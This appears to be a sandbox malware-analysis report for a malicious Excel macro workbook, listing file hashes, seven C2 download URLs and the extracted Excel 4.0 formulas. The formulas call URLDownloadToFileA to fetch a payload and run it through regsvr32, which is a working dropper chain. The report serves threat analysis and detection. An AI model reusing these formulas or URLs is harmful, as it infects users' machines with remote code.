Overview

overview

10

Static

static

10

90b99dea71...b.xlsm

windows7-x64

10

90b99dea71...b.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb

  • Size

    38KB

  • Sample

    241120-wldmqs1ekr

  • MD5

    e37d003f9e9dfdf3b4bfc18a72851d7b

  • SHA1

    dd6e692e31a50c48d84c059914c10f6ef6a13c40

  • SHA256

    90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb

  • SHA512

    137399d36d921fd1ee5916af6a63e67d50a99870676e219f98bcfc4af6b96858726b51770a070967d6cbc6d0ab3e67a30ba234e6ecd7063bd3489aa21a60ef7c

  • SSDEEP

    768:KmcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:KmqTeSOZZ1ZYpoQ/pMAeVIyTCR

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
xlm40.dropper

https://damjangro.org/data/IlBcH2mM/
xlm40.dropper

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
xlm40.dropper

https://www.awam.be/wp-admin/ug9Zz/
xlm40.dropper

https://protokol.mx/Archivos/SjKWNoeYre/
xlm40.dropper

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
xlm40.dropper

https://bengtverhoef.nl/stats/SJ1csD7/

Targets

    • Target

      90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb

    • Size

      38KB

    • MD5

      e37d003f9e9dfdf3b4bfc18a72851d7b

    • SHA1

      dd6e692e31a50c48d84c059914c10f6ef6a13c40

    • SHA256

      90b99dea71ca73b6b1ed59ed6640151255aa126504d1d88a7f32eed25ccbf9bb

    • SHA512

      137399d36d921fd1ee5916af6a63e67d50a99870676e219f98bcfc4af6b96858726b51770a070967d6cbc6d0ab3e67a30ba234e6ecd7063bd3489aa21a60ef7c

    • SSDEEP

      768:KmcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:KmqTeSOZZ1ZYpoQ/pMAeVIyTCR

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks